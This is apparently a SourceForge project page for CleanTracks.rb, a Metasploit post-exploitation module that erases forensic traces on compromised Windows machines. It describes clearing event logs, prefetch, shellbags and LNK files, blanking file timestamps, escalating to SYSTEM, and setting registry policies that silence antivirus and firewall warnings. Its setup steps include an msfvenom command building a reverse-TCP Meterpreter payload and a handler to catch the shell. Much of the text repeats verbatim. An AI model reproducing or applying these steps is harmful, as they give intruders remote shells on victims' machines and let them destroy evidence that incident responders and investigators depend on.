As metasploit framework long time user i realized that in actual database does not exist any module that covers your tracks efficiently (in a forensic data breach investigation) after a successfully exploitation. Looking at the actual database we can only find two 'meterpreter' modules that help us in your task: 'clearev' that clears the Applications, System and Security logs on a Window system (event viewer) and 'timestomp' to manipulate the MACE (Modified, Accessed, Changed) times of a file/appl (windows)...
But from a forensic point of view there are mutch more 'artifacts' left in the system that helps them to understand what steps we have taken: windowsir.blogspot/2013/07-howto-determine-user-access-to-files After a quick reading we can understand that most 'artifacts' are found in registry, .LNK files, Browser History, Prefetch Files (.pf), RecentDocs, ShellBags, TempRecent and in logfiles (.log|.tmp|.lnk) spread all over the system, for that reazon i have decided to write this anti-forensics post-exploitation.
:[ proof of concept ]:
CleanTracks.rb auxiliary as writen to work in post-exploitation (after the target gets exploited and a meterpreter session pops up), it rellys on policies registry keys and cmd commands (remote executed by auxiliary) to prevent/cover footprints left in target system.
PREVENT: the creation of data (footprints) in target sys by adding registry policie keys into target regedit. "this module should be run just after a sucessfully exploitation"..
CLEANER: clear temp/prefetch folders, flushdns cache, clear eventlogs, shellbags, lnk, tmp, dat, etc, this module should be run befor leaving the current session...
DEL_LOGS: 'clearev' (meterpreter API call) that gives us the ability to clear all event viewer log files just like clearev metasploit module does.
GET_SYS getprivs (API call) to elevate current session to nt authority/system, its advice to run it befor runnig any of the stages describe above.
DIR_MACE Blank MACE values in target inputed directory this option will change the MACE attributs of all files to null values inside the sellected directory..
REVERT Revert regedit policies to default values, this option will reverse all registry keys added by CleanTracks.rb 'set prevent true' option.
LOGOFF logoff target machine (optional, more effective).
[ MODULE ERROR REPORTS ]
New metasploit release have changed the class name to use 'MetasploitModule' so
if you are seeing this display it means that your metasploit its using an old class name.
To fix this display just edit one of metasploit module and check what class name
your version its using, then replace in my module the (class MetasploitModule)...
2º port auxiliary module to[ modules/auxiliary/analyze ] in metasploit directory
[kali linux example]:
/usr/share/metasploit-framework/modules/auxiliary/analyze/CleanTracks.rb
[ubuntu linux example]:
/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/CleanTracks.rb
4º build a windows meterpreter payload to test module
msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.1.69LPORT=666--platformwindows-fexe-opayload.exe"Send payload.exe to target using any method at your choise"
5º start a multi-handler
msfconsole-x'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.69; set LPORT 666; exploit'"execute payload.exe in target system with admin privs (execute as administrator)"
[ CleanTracks - Anti-forensics auxiliary ]
Version: 1.9 Author: pedr0 Ubuntu [ r00t-3xp10it ]
Hosted By: peterubuntu10[at]sourceforge[dot]net
http://sourceforge.net/projects/msf-auxiliarys/
https://sourceforge.net/p/msf-auxiliarys/repository/ci/master/tree/CleanTracks.rb
:[ Auxiliary Module History ]:
As metasploit framework long time user i realized that in actual database does not exist any module that covers your tracks efficiently (in a forensic data breach investigation) after a successfully exploitation. Looking at the actual database we can only find two 'meterpreter' modules that help us in your task: 'clearev' that clears the Applications, System and Security logs on a Window system (event viewer) and 'timestomp' to manipulate the MACE (Modified, Accessed, Changed) times of a file/appl (windows)...
But from a forensic point of view there are mutch more 'artifacts' left in the system that helps them to understand what steps we have taken: windowsir.blogspot/2013/07-howto-determine-user-access-to-files After a quick reading we can understand that most 'artifacts' are found in registry, .LNK files, Browser History, Prefetch Files (.pf), RecentDocs, ShellBags, Temp Recent and in logfiles (.log|.tmp|.lnk) spread all over the system, for that reazon i have decided to write this anti-forensics post-exploitation.
:[ proof of concept ]:
CleanTracks.rb auxiliary as writen to work in post-exploitation (after the target gets exploited and a meterpreter session pops up), it rellys on policies registry keys and cmd commands (remote executed by auxiliary) to prevent/cover footprints left in target system.
PREVENT: the creation of data (footprints) in target sys by adding registry policie keys into target regedit. "this module should be run just after a sucessfully exploitation"..
CLEANER: clear temp/prefetch folders, flushdns cache, clear eventlogs, shellbags, lnk, tmp, dat, etc, this module should be run befor leaving the current session...
DEL_LOGS: 'clearev' (meterpreter API call) that gives us the ability to clear all event viewer log files just like clearev metasploit module does.
GET_SYS getprivs (API call) to elevate current session to nt authority/system, its advice to run it befor runnig any of the stages describe above.
DIR_MACE Blank MACE values in target inputed directory this option will change the MACE attributs of all files to null values inside the sellected directory..
REVERT Revert regedit policies to default values, this option will reverse all registry keys added by CleanTracks.rb 'set prevent true' option.
LOGOFF logoff target machine (optional, more effective).
[ MODULE ERROR REPORTS ]
New metasploit release have changed the class name to use 'MetasploitModule' so
if you are seeing this display it means that your metasploit its using an old class name.
To fix this display just edit one of metasploit module and check what class name
your version its using, then replace in my module the (class MetasploitModule)...
:[ registry policies keys used ]:
Disable updation of Accessed attributes in file/folder properties (MACE)
clear the list of most recent commands that have been used (RUN)
Prevents the system from remembering about the programs run.
Detect application installations and prompt for elevation (UAC)
Prevent regedit.exe from displays the last key accessed (REG)
No entry of documents accessed recently in recent documents.
Disable all most frequently used programs from Start menu.
Empty temporary Internet files on exiting Internet Explorer.
Delete the list of recently used documents on logoff
hide recent used files drop-down field inside dialog
Delete the pagefile during the shutdown process.
dont store open applications names (MUICache)
Erase entries in the command history list (CMD)
delete List of computers associated with on a LAN
At logoff, delete local copy of users offline files
Disable security center warning of antivirus.
Disable security center warning of firewall.
Clear internet url history (days to keep)
Delete last sitename accessed (REG)
delete table of programs executed
delete content indexing
:[ how to Download/Use it ]:
1º download auxiliary module
2º port auxiliary module to [ modules/auxiliary/analyze ] in metasploit directory
3º start metasploit and postgresql services
4º build a windows meterpreter payload to test module
5º start a multi-handler
6º load/use auxiliary
:[ Final notes ]:
This project its under develop and any colaborative help in improving it, will be mutch appreciated, like the inclusion of more 'artifacts locations' or 'registry keys' to prevent the creation of data in the first place, more info about forensics windows investigation here: fireeye.com-threat-research
magnetforensics.com-forensic-analysis-of-lnk-files
Forensic focous- Analysis Of The Windows Registry
windowsir.blogspot-howto-determine-user-access-to-files
CleanTracks - Anti-forensics auxiliary
Special thanks to: Betto Avalos [debugging],
Chaitanya [debugging], Spirit [debugging]
Video not available
Video not available
Video not available
Suspicious Shell Activity - RedTeam develop @2016
Last edit: pedro ubuntu 2016-08-30
View and moderate all "General Discussion" comments posted by this user
Mark all as spam, and block user from posting to "Discussion"
great ...
have fun ..